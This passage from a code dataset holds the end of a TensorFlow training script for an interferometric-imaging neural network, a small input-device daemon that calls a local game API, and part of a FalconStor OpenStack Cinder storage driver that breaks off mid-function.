gradient = [tf.clip_by_norm(grad, 5.) for grad in gradient]\n optim.apply_gradients(zip(gradient, rim.model.trainable_variables))\n # Update metrics with \"converged\" score\n chi_squared = tf.reduce_mean(chi_squared[-1])\n return cost, chi_squared\n\n # ====== Training loop ============================================================================================\n time_per_step = tf.metrics.Mean()\n epoch_loss = tf.metrics.Mean()\n epoch_chi_squared = tf.metrics.Mean()\n history = { # recorded at the end of an epoch only\n \"train_chi_squared\": [],\n \"train_cost\": [],\n \"learning_rate\": [],\n \"time_per_step\": [],\n \"step\": [],\n \"wall_time\": []\n }\n best_loss = np.inf\n patience = args.patience\n step = 0\n global_start = time.time()\n estimated_time_for_epoch = 0\n out_of_time = False\n lastest_checkpoint = 1\n for epoch in range(args.epochs):\n if (time.time() - global_start) > args.max_time * 3600 - estimated_time_for_epoch:\n break\n epoch_start = time.time()\n epoch_loss.reset_states()\n epoch_chi_squared.reset_states()\n time_per_step.reset_states()\n with writer.as_default():\n for batch, (X, Y, noise_rms) in enumerate(train_dataset):\n start = time.time()\n cost, chi_squared = train_step(X, Y, noise_rms)\n # ========== Summary and logs =========================================================================\n _time = time.time() - start\n time_per_step.update_state([_time])\n epoch_loss.update_state([cost])\n epoch_chi_squared.update_state([chi_squared])\n step += 1\n # last batch we make a summary of residuals\n if args.n_residuals > 0:\n tf.summary.image(f\"Residuals\",\n plot_to_image(\n residual_plot(\n train_dataset,\n rim,\n args.n_residuals\n )), step=step)\n\n train_cost = epoch_loss.result().numpy()\n train_chi_sq = epoch_chi_squared.result().numpy()\n tf.summary.scalar(\"Time per step\", time_per_step.result(), step=step)\n tf.summary.scalar(\"Chi Squared\", train_chi_sq, step=step)\n tf.summary.scalar(\"MSE\", train_cost, step=step)\n tf.summary.scalar(\"Learning Rate\", optim.lr(step), step=step)\n print(f\"epoch {epoch} | train loss {train_cost:.3e} \"\n f\"| lr {optim.lr(step).numpy():.2e} | time per step {time_per_step.result().numpy():.2e} s\"\n f\"| chi sq {train_chi_sq:.2e}\")\n history[\"train_cost\"].append(train_cost)\n 
history[\"learning_rate\"].append(optim.lr(step).numpy())\n history[\"train_chi_squared\"].append(train_chi_sq)\n history[\"time_per_step\"].append(time_per_step.result().numpy())\n history[\"step\"].append(step)\n history[\"wall_time\"].append(time.time() - global_start)\n\n cost = train_cost\n if np.isnan(cost):\n print(\"Training broke the Universe\")\n break\n if cost < (1 - args.tolerance) * best_loss:\n best_loss = cost\n patience = args.patience\n else:\n patience -= 1\n if (time.time() - global_start) > args.max_time * 3600:\n out_of_time = True\n if save_checkpoint:\n checkpoint_manager.checkpoint.step.assign_add(1) # a bit of a hack\n if epoch % args.checkpoints == 0 or patience == 0 or epoch == args.epochs - 1 or out_of_time:\n with open(os.path.join(checkpoints_dir, \"score_sheet.txt\"), mode=\"a\") as f:\n np.savetxt(f, np.array([[lastest_checkpoint, cost]]))\n lastest_checkpoint += 1\n checkpoint_manager.save()\n print(\"Saved checkpoint for step {}: {}\".format(int(checkpoint_manager.checkpoint.step), checkpoint_manager.latest_checkpoint))\n if patience == 0:\n print(\"Reached patience\")\n break\n if out_of_time:\n break\n if epoch > 0:\n estimated_time_for_epoch = time.time() - epoch_start\n if optim.lr(step).numpy() < 1e-8:\n print(\"Reached learning rate limit\")\n break\n print(f\"Finished training after {(time.time() - global_start) / 3600:.3f} hours.\")\n return history, best_loss\n\n\nif __name__ == '__main__':\n from argparse import ArgumentParser\n parser = ArgumentParser()\n parser.add_argument(\"--model_id\", default=\"None\", help=\"Start from this model id checkpoint. None means start from scratch\")\n parser.add_argument(\"--architecture\", default=\"unet\", help=\"Argument must be one of ['hourglass', 'unet']\")\n\n # Binary dataset parameters\n parser.add_argument(\"--total_items\", default=10, type=int, help=\"Total items in an epoch\")\n parser.add_argument(\"--batch_size\", default=1, type=int)\n parser.add_argument(\"--width\", default=2, type=float, help=\"Sigma parameter of super-gaussian in pixel units\")\n\n # Physical Model parameters\n parser.add_argument(\"--wavelength\", default=3.8e-6, type=float, help=\"Wavelength in meters\")\n parser.add_argument(\"--oversampling_factor\", default=None, type=float, help=\"Set the pixels size = resolution / oversampling_factor. Resolution is set by Michelson criteria\")\n parser.add_argument(\"--chi_squared\", default=\"append_visibility_amplitude_closure_phase\", help=\"One of 'visibility' or 'append_visibility_amplitude_closure_phase'. 
Default is the latter.\")\n parser.add_argument(\"--pixels\", default=128, type=int)\n parser.add_argument(\"--redundant\", action=\"store_true\", help=\"Whether to use redundant closure phase in likelihood or not\")\n parser.add_argument(\"--plate_scale\", default=5, type=float, help=\"Size of a pixel, in mas\")\n parser.add_argument(\"--beta\", default=1, type=float, help=\"Lagrange multiplier for the closure phase term.\")\n\n # RIM hyper parameters\n parser.add_argument(\"--steps\", default=6, type=int, help=\"Number of recurrent steps in the model\")\n\n # Neural network hyper parameters\n parser.add_argument(\"--filters\", default=32, type=int)\n parser.add_argument(\"--filter_scaling\", default=2, type=float)\n parser.add_argument(\"--kernel_size\", default=3, type=int)\n parser.add_argument(\"--layers\", default=2, type=int)\n parser.add_argument(\"--block_conv_layers\", default=2, type=int)\n parser.add_argument(\"--strides\", default=2, type=int)\n parser.add_argument(\"--input_kernel_size\", default=7, type=int)\n parser.add_argument(\"--upsampling_interpolation\", action=\"store_true\")\n parser.add_argument(\"--activation\", default=\"tanh\")\n parser.add_argument(\"--initializer\", default=\"glorot_normal\")\n\n # Optimization params\n parser.add_argument(\"--epochs\", default=10, type=int, help=\"Number of epochs for training.\")\n parser.add_argument(\"--optimizer\", default=\"Adamax\", help=\"Class name of the optimizer (e.g. 'Adam' or 'Adamax')\")\n parser.add_argument(\"--initial_learning_rate\", default=1e-4, type=float, help=\"Initial learning rate.\")\n parser.add_argument(\"--decay_rate\", default=1., type=float, help=\"Exponential decay rate of learning rate (1=no decay).\")\n parser.add_argument(\"--decay_steps\", default=1000, type=int, help=\"Decay steps of exponential decay of the learning rate.\")\n parser.add_argument(\"--staircase\", action=\"store_true\", help=\"Learning rate schedule only change after decay steps if enabled.\")\n parser.add_argument(\"--patience\", default=np.inf, type=int, help=\"Number of step at which training is stopped if no improvement is recorder.\")\n parser.add_argument(\"--tolerance\", default=0, type=float, help=\"Current score <= (1 - tolerance) * best score => reset patience, else reduce patience.\")\n parser.add_argument(\"--track_train\", action=\"store_true\", help=\"Track training metric instead of validation metric, in case we want to overfit\")\n parser.add_argument(\"--max_time\", default=np.inf, type=float, help=\"Time allowed for the training, in hours.\")\n parser.add_argument(\"--time_weights\", default=\"uniform\", help=\"uniform: w_t=1 for all t, linear: w_t~t, quadratic: w_t~t^2\")\n parser.add_argument(\"--reset_optimizer_states\", action=\"store_true\", help=\"When training from pre-trained weights, reset states of optimizer.\")\n parser.add_argument(\"--residual_weights\", default=\"sqrt\", help=\"Options are ['uniform', 'linear', 'quadratic', 'sqrt']\")\n\n # logs\n parser.add_argument(\"--logdir\", default=\"None\", help=\"Path of logs directory. 
Default if None, no logs recorded.\")\n parser.add_argument(\"--model_dir\", default=\"None\", help=\"Path to the directory where to save models checkpoints.\")\n parser.add_argument(\"--logname\", default=None, help=\"Overwrite name of the log with this argument\")\n parser.add_argument(\"--logname_prefixe\", default=\"RIM\", help=\"If name of the log is not provided, this prefix is prepended to the date\")\n parser.add_argument(\"--checkpoints\", default=10, type=int, help=\"Save a checkpoint of the models each {%} iteration.\")\n parser.add_argument(\"--max_to_keep\", default=3, type=int, help=\"Max model checkpoint to keep.\")\n parser.add_argument(\"--n_residuals\", default=2, type=int, help=\"Number of residual plots to save. Add overhead at the end of an epoch only. Should be >= 2.\")\n\n # Reproducibility params\n parser.add_argument(\"--seed\", default=42, type=int, help=\"Random seed for numpy and tensorflow.\")\n parser.add_argument(\"--json_override\", default=None, nargs=\"+\", help=\"A json filepath that will override every command line parameters. Useful for reproducibility\")\n args = parser.parse_args()\n main(args)\n","sub_path":"scripts/train_rim_on_n_companions.py","file_name":"train_rim_on_n_companions.py","file_ext":"py","file_size_in_byte":18953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"434061522","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n# bumper-reader.py\n#\n# Copyright (C) 2014 HES-SO//HEG Arc\n#\n# Author(s): Cédric Gaspoz \n#\n# This file is part of Wheel.\n#\n# Wheel is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Wheel is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Wheel. If not, see .\n\n#standard python libs\nimport logging\nimport time\nimport requests\nfrom evdev import InputDevice, ecodes, list_devices, categorize\n\nlogging.basicConfig()\n\nAPI_URL = 'http://192.168.1.1/game/api/bumper'\n\nwhile True:\n logging.info(\"Getting the device...\")\n dev = InputDevice('/dev/input/event2')\n\n if dev:\n logging.info(\"We got the device...\")\n dev.grab()\n logging.info(\"Starting the Bumper Reader daemon...\")\n while True:\n try:\n for event in dev.read_loop():\n if event.type == ecodes.EV_KEY:\n data = categorize(event)\n if data.keystate == 1:\n # Bumper pressed\n url = API_URL\n r = requests.get(url)\n except IOError:\n logging.error(\"IOError\")\n break\n time.sleep(2)\n\nlogging.info(\"Terminating the Bumper Reader daemon...\")\n","sub_path":"daemons/bumper-daemon.py","file_name":"bumper-daemon.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"601687982","text":"# Copyright (c) 2016 FalconStor, Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. 
You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport base64\nimport json\nimport random\nimport time\nimport uuid\n\nfrom oslo_log import log as logging\nfrom oslo_utils import excutils\nfrom oslo_utils import units\nfrom six.moves import http_client\n\nfrom cinder import exception\nfrom cinder.i18n import _, _LI, _LW\n\n\nFSS_BATCH = 'batch'\nFSS_PHYSICALRESOURCE = 'physicalresource'\nFSS_PHYSICALADAPTER = 'physicaladapter'\nFSS_FCCLIENTINITIATORS = 'fcclientinitiators'\nFSS_FC_TGT_WWPN = 'fctgtwwpn'\nFSS_STORAGE_POOL = 'storagepool'\nFSS_LOGICALRESOURCE = 'logicalresource'\nFSS_SAN = 'sanresource'\nFSS_MIRROR = 'mirror'\nFSS_TIMEMARKPOLICY = 'timemarkpolicy'\nFSS_TIMEMARK = 'timemark'\nFSS_TIMEVIEW = 'timeview'\nFSS_SNAPSHOT_RESOURCE = 'snapshotresource'\nFSS_SNAPSHOT_GROUP = 'snapshotgroup'\nFSS_CLIENT = 'client'\nFSS_SANCLIENT = 'sanclient'\nFSS_ISCSI_TARGET = 'iscsitarget'\nFSS_ISCSI_CLIENT_INITIATORS = 'iscsiclientinitiators'\nFSS_SERVER = 'server'\nFSS_OPTIONS = 'options'\nFSS_PORTAL = 'defaultiscsiportal'\nFSS_PROPERTIES = 'properties'\nFSS_HOST = 'host'\nFSS_RETURN_CODE = 'rcs'\nFSS_AUTH = 'auth'\nFSS_LOGIN = 'login'\nFSS_SINGLE_TYPE = 'single'\n\n\nPOST = 'POST'\nGET = 'GET'\nPUT = 'PUT'\nDELETE = 'DELETE'\nGROUP_PREFIX = 'OpenStack-'\nPRODUCT_NAME = 'ipstor'\nSESSION_COOKIE_NAME = 'session_id'\nRETRY_LIST = ['107', '2147680512']\n\nMAXSNAPSHOTS = 1000\nOPERATION_TIMEOUT = 60 * 60\nRETRY_CNT = 5\nRETRY_INTERVAL = 15\n\nLOG = logging.getLogger(__name__)\n\n\nclass RESTProxy(object):\n def __init__(self, config):\n self.fss_host = config.san_ip\n self.fss_username = config.san_login\n self.fss_password = config.san_password\n self.fss_defined_pool = config.fss_pool\n if config.additional_retry_list:\n RETRY_LIST.append(config.additional_retry_list)\n\n self.FSS = FSSRestCommon(\n host=self.fss_host,\n username=self.fss_username,\n password=self.fss_password,\n fss_debug=config.fss_debug)\n self.session_id = None\n\n # naming\n def _get_vol_name_from_snap(self, snapshot):\n \"\"\"Return the name of the snapshot that FSS will use.\"\"\"\n return \"cinder-%s\" % snapshot[\"volume_id\"]\n\n def _get_fss_volume_name(self, volume):\n \"\"\"Return the name of the volume FSS will use.\"\"\"\n return \"cinder-%s\" % volume[\"id\"]\n\n def _get_group_name_from_id(self, id):\n return \"cinder-consisgroup-%s\" % id\n\n def _encode_name(self, name):\n uuid_str = name.replace(\"-\", \"\")\n vol_uuid = uuid.UUID('urn:uuid:%s' % uuid_str)\n newuuid = (base64.urlsafe_b64encode(vol_uuid.bytes).\n decode('utf-8').strip('='))\n return \"cinder-%s\" % newuuid\n\n def do_setup(self):\n self.session_id = self.FSS.fss_login()\n\n def _convert_size_to_gb(self, size):\n s = round(float(size) / units.Gi, 2)\n if s > 0:\n return s\n else:\n return 0\n\n def _convert_size_to_mb(self, size):\n return size * units.Ki\n\n def _get_pools_info(self):\n qpools = []\n poolinfo = {}\n try:\n output = self.list_pool_info()\n if \"storagepools\" in output['data']:\n for item in output['data']['storagepools']:\n if item['name'].startswith(GROUP_PREFIX) and (\n self.fss_defined_pool == item['id']):\n poolid = int(item['id'])\n qpools.append(poolid)\n 
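# only the pool configured as fss_defined_pool is wanted, so stop scanning once it is found\n 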
break\n\n if not qpools:\n msg = _('The storage pool information is empty or not correct')\n raise exception.DriverNotInitialized(msg)\n\n # Query pool detail information\n for poolid in qpools:\n output = self.list_pool_info(poolid)\n poolinfo['pool_name'] = output['data']['name']\n poolinfo['total_capacity_gb'] = (\n self._convert_size_to_gb(output['data']['size']))\n poolinfo['used_gb'] = (\n self._convert_size_to_gb(output['data']['used']))\n poolinfo['QoS_support'] = False\n poolinfo['reserved_percentage'] = 0\n except Exception:\n msg = (_('Unexpected exception during get pools info.'))\n LOG.exception(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n return poolinfo\n\n def list_pool_info(self, pool_id=None):\n return self.FSS.list_pool_info(pool_id)\n\n def list_physicaladapter_info(self, adapter_id=None):\n return self.FSS.list_physicaladapter_info(adapter_id)\n\n def _checking_adapter_type(self, id):\n adapter_type = ''\n output = self.list_physicaladapter_info()\n if \"physicaladapters\" in output['data']:\n physicaladapters = output['data']['physicaladapters']\n if physicaladapters['id'] == id:\n adapter_type = physicaladapters['type']\n return adapter_type\n\n def create_vdev(self, volume):\n sizemb = self._convert_size_to_mb(volume[\"size\"])\n volume_name = self._get_fss_volume_name(volume)\n params = dict(storagepoolid=self.fss_defined_pool,\n category=\"virtual\",\n sizemb=sizemb,\n name=volume_name)\n return volume_name, self.FSS.create_vdev(params)\n\n def create_tv_from_cdp_tag(self, volume_metadata, volume):\n tv_vid = ''\n cdp_tag = ''\n\n if 'cdptag' in volume_metadata:\n tv_vid = str(volume_metadata['timeview']) + '_0'\n cdp_tag = str(volume_metadata['cdptag'])\n\n if 'rawtimestamp' in volume_metadata:\n tv_vid = '{0}_{1}'.format(str(volume_metadata['timeview']),\n str(volume_metadata['rawtimestamp']))\n volume_name = self._get_fss_volume_name(volume)\n sizemb = self._convert_size_to_mb(volume['size'])\n params = dict(name=volume_name,\n storage=dict(storagepoolid=self.fss_defined_pool,\n sizemb=sizemb),\n automaticexpansion=dict(enabled=False),\n timeviewcopy=True)\n if cdp_tag:\n params.update(cdpjournaltag=cdp_tag)\n\n metadata = self.FSS.create_timeview(tv_vid, params)\n return volume_name, metadata\n\n def create_thin_vdev(self, volume_metadata, volume):\n thin_size = 0\n size = volume[\"size\"]\n sizemb = self._convert_size_to_mb(size)\n params = dict(storagepoolid=self.fss_defined_pool,\n category=\"virtual\")\n\n if 'thinprovisioned' in volume_metadata:\n if volume_metadata['thinprovisioned'] is False:\n msg = (_('If you want to create a thin provisioning volume,'\n ' this param must be True.'))\n raise exception.VolumeBackendAPIException(msg)\n\n if 'thinsize' in volume_metadata:\n thin_size = int(volume_metadata['thinsize'])\n\n if size < 10:\n msg = _('The resource is a FSS thin device, minimum size is '\n '10240 MB.')\n raise exception.VolumeBackendAPIException(msg)\n else:\n try:\n if thin_size > size:\n msg = _('The allocated size must less than total size.')\n raise exception.VolumeBackendAPIException(msg)\n except Exception:\n msg = _('The resource is a thin device, thin size is invalid.')\n raise exception.VolumeBackendAPIException(msg)\n\n thin_size = self._convert_size_to_mb(thin_size)\n thin_disk = dict(\n enabled=True,\n fullsizemb=sizemb)\n params.update(thinprovisioning=thin_disk)\n params.update(sizemb=thin_size)\n\n volume_name = self._get_fss_volume_name(volume)\n params.update(name=volume_name)\n return volume_name, 
self.FSS.create_vdev(params)\n\n def _get_fss_vid_from_name(self, volume_name, fss_type=None):\n vid = []\n output = self.FSS.list_fss_volume_info()\n try:\n if \"virtualdevices\" in output['data']:\n for item in output['data']['virtualdevices']:\n if item['name'] in volume_name:\n vid.append(item['id'])\n except Exception:\n msg = (_('Can not find cinder volume - %(volumeName)s') %\n {\"volumeName\": volume_name})\n raise exception.VolumeBackendAPIException(msg)\n\n if fss_type is not None and fss_type == FSS_SINGLE_TYPE:\n vid = ''.join(str(x) for x in vid)\n return vid\n\n def _get_fss_gid_from_name(self, group_name):\n gid = ''\n output = self.FSS.list_group_info()\n if \"snapshotgroups\" in output['data']:\n for item in output['data']['snapshotgroups']:\n if item['name'] == group_name:\n gid = item['id']\n break\n if gid == '':\n msg = (_('Can not find consistency group: %s.') % group_name)\n raise exception.VolumeBackendAPIException(msg)\n return gid\n\n def _get_fss_group_membercount(self, gid):\n membercount = 0\n output = self.FSS.list_group_info(gid)\n if \"membercount\" in output['data']:\n membercount = output['data']['membercount']\n return membercount\n\n def _get_vdev_id_from_group_id(self, group_id):\n vidlist = []\n output = self.FSS.list_group_info(group_id)\n if \"virtualdevices\" in output['data']:\n for item in output['data']['virtualdevices']:\n vidlist.append(item['id'])\n return vidlist\n\n def clone_volume(self, new_vol_name, source_volume_name):\n params = dict(storagepoolid=self.fss_defined_pool)\n volume_metadata = {}\n new_vid = ''\n vid = self._get_fss_vid_from_name(source_volume_name, FSS_SINGLE_TYPE)\n mirror_params = dict(\n category='virtual',\n selectioncriteria='anydrive',\n mirrortarget=\"virtual\"\n )\n mirror_params.update(params)\n ret1 = self.FSS.create_mirror(vid, mirror_params)\n\n if ret1:\n if ret1['rc'] != 0:\n failed_ret = self.FSS.get_fss_error_code(ret1['rc'])\n raise exception.VolumeBackendAPIException(data=failed_ret)\n\n ret2 = self.FSS.sync_mirror(vid)\n self.FSS._random_sleep()\n if ret2['rc'] == 0:\n self.FSS._check_mirror_sync_finished(vid, OPERATION_TIMEOUT)\n ret3 = self.FSS.promote_mirror(vid, new_vol_name)\n if ret3 and ret3['rc'] == 0:\n new_vid = ret3['id']\n\n volume_metadata['FSS-vid'] = new_vid\n return volume_metadata\n\n def delete_vdev(self, volume):\n volume_name = self._get_fss_volume_name(volume)\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n if vid:\n return self.FSS.delete_vdev(vid)\n else:\n msg = _('vid is null. FSS failed to delete volume.')\n raise exception.VolumeBackendAPIException(data=msg)\n\n def create_snapshot(self, snapshot):\n snap_metadata = {}\n volume_name = self._get_vol_name_from_snap(snapshot)\n snap_name = snapshot[\"display_name\"]\n size = snapshot['volume_size']\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n if not vid:\n msg = _('vid is null. 
FSS failed to create snapshot.')\n raise exception.VolumeBackendAPIException(data=msg)\n\n (snap, tm_policy, vdev_size) = (self.FSS.\n _check_if_snapshot_tm_exist(vid))\n\n if not snap:\n self.create_vdev_snapshot(vid, self._convert_size_to_mb(size))\n if not tm_policy:\n self.FSS.create_timemark_policy(\n vid, storagepoolid=self.fss_defined_pool)\n if not snap_name:\n snap_name = \"snap-%s\" % time.strftime('%Y%m%d%H%M%S')\n\n self.FSS.create_timemark(vid, snap_name)\n snap_metadata['fss_tm_comment'] = snap_name\n return snap_metadata\n\n def delete_snapshot(self, snapshot):\n volume_name = self._get_vol_name_from_snap(snapshot)\n snap_name = snapshot[\"display_name\"]\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n if not vid:\n msg = _('vid is null. FSS failed to delete snapshot')\n raise exception.VolumeBackendAPIException(data=msg)\n if not snap_name:\n if ('metadata' in snapshot and 'fss_tm_comment' in\n snapshot['metadata']):\n snap_name = snapshot['metadata']['fss_tm_comment']\n\n tm_info = self.FSS.get_timemark(vid)\n rawtimestamp = self._get_timestamp(tm_info, snap_name)\n if rawtimestamp:\n timestamp = '%s_%s' % (vid, rawtimestamp)\n self.FSS.delete_timemark(timestamp)\n\n final_tm_data = self.FSS.get_timemark(vid)\n if \"timemark\" in final_tm_data['data']:\n if not final_tm_data['data']['timemark']:\n self.FSS.delete_timemark_policy(vid)\n self.FSS.delete_vdev_snapshot(vid)\n\n def _get_timestamp(self, tm_data, encode_snap_name):\n timestamp = ''\n if \"timemark\" in tm_data['data']:\n for item in tm_data['data']['timemark']:\n if \"comment\" in item and item['comment'] == encode_snap_name:\n timestamp = item['rawtimestamp']\n break\n return timestamp\n\n def create_volume_from_snapshot(self, volume, snapshot):\n volume_metadata = {}\n volume_name = self._get_vol_name_from_snap(snapshot)\n snap_name = snapshot[\"display_name\"]\n new_vol_name = self._get_fss_volume_name(volume)\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n if not vid:\n msg = _('vid is null. FSS failed to create_volume_from_snapshot.')\n raise exception.VolumeBackendAPIException(data=msg)\n\n if not snap_name:\n if ('metadata' in snapshot) and ('fss_tm_comment'\n in snapshot['metadata']):\n snap_name = snapshot['metadata']['fss_tm_comment']\n\n tm_info = self.FSS.get_timemark(vid)\n rawtimestamp = self._get_timestamp(tm_info, snap_name)\n if not rawtimestamp:\n msg = _('rawtimestamp is null. 
FSS failed to '\n 'create_volume_from_snapshot.')\n raise exception.VolumeBackendAPIException(data=msg)\n\n timestamp = '%s_%s' % (vid, rawtimestamp)\n output = self.FSS.copy_timemark(\n timestamp, storagepoolid=self.fss_defined_pool, name=new_vol_name)\n if output['rc'] == 0:\n vid = output['id']\n self.FSS._random_sleep()\n if self.FSS._check_tm_copy_finished(vid, OPERATION_TIMEOUT):\n volume_metadata['FSS-vid'] = vid\n return volume_name, volume_metadata\n\n def extend_vdev(self, volume_name, vol_size, new_size):\n if new_size > vol_size:\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n size = self._convert_size_to_mb(new_size - vol_size)\n params = dict(\n action='expand',\n sizemb=size\n )\n return self.FSS.extend_vdev(vid, params)\n\n def list_volume_info(self, vid):\n return self.FSS.list_fss_volume_info(vid)\n\n def rename_vdev(self, vid, new_vol_name):\n params = dict(\n action='update',\n name=new_vol_name\n )\n return self.FSS.rename_vdev(vid, params)\n\n def assign_iscsi_vdev(self, client_id, target_id, vid):\n params = dict(\n action=\"assign\",\n virtualdeviceids=[vid],\n iscsi=dict(target=target_id)\n )\n return self.FSS.assign_vdev(client_id, params)\n\n def assign_fc_vdev(self, client_id, vid):\n params = dict(\n action=\"assign\",\n virtualdeviceids=[vid],\n fc=dict(\n fcmapping='alltoall',\n accessmode='readwritenonexclusive')\n )\n return self.FSS.assign_vdev(client_id, params)\n\n def unassign_vdev(self, client_id, vid):\n params = dict(\n action=\"unassign\",\n virtualdeviceid=vid\n )\n return self.FSS.unassign_vdev(client_id, params)\n\n def _create_vdev_snapshot(self, volume_name, size):\n vid = self._get_fss_vid_from_name(volume_name, FSS_SINGLE_TYPE)\n return self.create_vdev_snapshot(vid, self._convert_size_to_mb(size))\n\n def create_vdev_snapshot(self, vid, size):\n params = dict(\n idlist=[vid],\n selectioncriteria='anydrive',\n policy='alwayswrite',\n sizemb=size,\n storagepoolid=self.fss_defined_pool\n )\n return self.FSS.create_vdev_snapshot(params)\n\n def create_group(self, group):\n group_name = self._get_group_name_from_id(group['id'])\n params = dict(\n name=group_name\n )\n return self.FSS.create_group(params)\n\n def destroy_group(self, group):\n group_name = self._get_group_name_from_id(group['id'])\n gid = self._get_fss_gid_from_name(group_name)\n return self.FSS.destroy_group(gid)\n\n def _add_volume_to_consistency_group(self, group_id, vol_name):\n self.set_group(group_id, addvollist=[vol_name])\n\n def set_group(self, group_id, **kwargs):\n group_name = self._get_group_name_from_id(group_id)\n gid = self._get_fss_gid_from_name(group_name)\n\n join_params = dict()\n leave_params = dict()\n if kwargs.get('addvollist'):\n joing_vid = self._get_fss_vid_from_name(kwargs['addvollist'])\n join_params.update(\n action='join',\n virtualdevices=joing_vid\n )\n if kwargs.get('remvollist'):\n leave_vid = self._get_fss_vid_from_name(kwargs['remvollist'])\n leave_params.update(\n action='leave',\n virtualdevices=leave_vid\n )\n return self.FSS.set_group(gid, join_params, leave_params)\n\n def create_cgsnapshot(self, cgsnapshot):\n group_name = self._get_group_name_from_id(\n cgsnapshot['consistencygroup_id'])\n gsnap_name = self._encode_name(cgsnapshot['id'])\n gid = self._get_fss_gid_from_name(group_name)\n vidlist = self._get_vdev_id_from_group_id(gid)\n\n for vid in vidlist:\n (snap, tm_policy, sizemb) = (self.FSS.\n _check_if_snapshot_tm_exist(vid))\n if not snap:\n self.create_vdev_snapshot(vid, sizemb)\n if not tm_policy:\n 
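# lazily create the missing per-device TimeMark policy before taking the group snapshot\n 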
self.FSS.create_timemark_policy(\n vid, storagepoolid=self.fss_defined_pool)\n\n group_tm_policy = self.FSS._check_if_group_tm_enabled(gid)\n if not group_tm_policy:\n self.create_group_timemark_policy(gid)\n\n self.create_group_timemark(gid, gsnap_name)\n\n def create_group_timemark_policy(self, gid):\n tm_params = dict(\n automatic=dict(enabled=False),\n maxtimemarkcount=MAXSNAPSHOTS\n )\n return self.FSS.create_group_timemark_policy(gid, tm_params)\n\n def create_group_timemark(self, gid, gsnap_name):\n params = dict(\n comment=gsnap_name,\n priority='medium',\n snapshotnotification=False\n )\n return self.FSS.create_group_timemark(gid, params)\n\n def delete_cgsnapshot(self, cgsnapshot):\n group_name = self._get_group_name_from_id(\n cgsnapshot['consistencygroup_id'])\n encode_snap_name = self._encode_name(cgsnapshot['id'])\n gid = self._get_fss_gid_from_name(group_name)\n\n if not gid:\n msg = _('gid is null. FSS failed to delete cgsnapshot.')\n raise exception.VolumeBackendAPIException(data=msg)\n\n if self._get_fss_group_membercount(gid) != 0:\n tm_info = self.FSS.get_group_timemark(gid)\n rawtimestamp = self._get_timestamp(tm_info, encode_snap_name)\n timestamp = '%s_%s' % (gid, rawtimestamp)\n self.delete_group_timemark(timestamp)\n\n final_tm_data = self.FSS.get_group_timemark(gid)\n if \"timemark\" in final_tm_data['data']:\n if not final_tm_data['data']['timemark']:\n self.FSS.delete_group_timemark_policy(gid)\n\n def delete_group_timemark(self, timestamp):\n params = dict(\n deleteallbefore=False\n )\n return self.FSS.delete_group_timemark(timestamp, params)\n\n def _check_iscsi_option(self):\n output = self.FSS.get_server_options()\n if \"iscsitarget\" in output['data']:\n if not output['data']['iscsitarget']:\n self.FSS.set_server_options('iscsitarget')\n\n def _check_fc_target_option(self):\n output = self.FSS.get_server_options()\n if \"fctarget\" in output['data']:\n if not output['data']['fctarget']:\n self.FSS.set_server_options('fctarget')\n\n def _check_iocluster_state(self):\n output = self.FSS.get_server_options()\n if 'iocluster' not in output['data']:\n msg = _('No iocluster information in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n return output['data']['iocluster']\n\n def list_fc_target_wwpn(self):\n return self.FSS.list_fc_target_wwpn()\n\n def list_fc_client_initiators(self):\n return self.FSS.list_fc_client_initiators()\n\n def create_fc_client(self, cinder_host_name, free_initiator_wwpns):\n client_id = 0\n params = dict(\n name=cinder_host_name,\n protocoltype=[\"fc\"],\n ipaddress=self.fss_host,\n ostype='linux',\n fcpolicy=dict(\n initiators=[free_initiator_wwpns],\n vsaenabled=False\n )\n )\n client_info = self.FSS.create_client(params)\n if client_info and client_info['rc'] == 0:\n client_id = client_info['id']\n return client_id\n\n def list_iscsi_target_info(self, target_id=None):\n return self.FSS.list_iscsi_target_info(target_id)\n\n def _check_fc_host_devices_empty(self, client_id):\n is_empty = False\n output = self.FSS.list_sanclient_info(client_id)\n if 'data' not in output:\n msg = _('No target in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n if 'fcdevices' not in output['data']:\n msg = _('No fcdevices in given data.')\n LOG.error(msg)\n raise exception.VolumeBackendAPIException(data=msg)\n\n if len(output['data']['fcdevices']) == 0:\n is_empty = True\n self.FSS.delete_client(client_id)\n return is_empty\n\n def create_iscsi_client(self, cinder_host_name, 
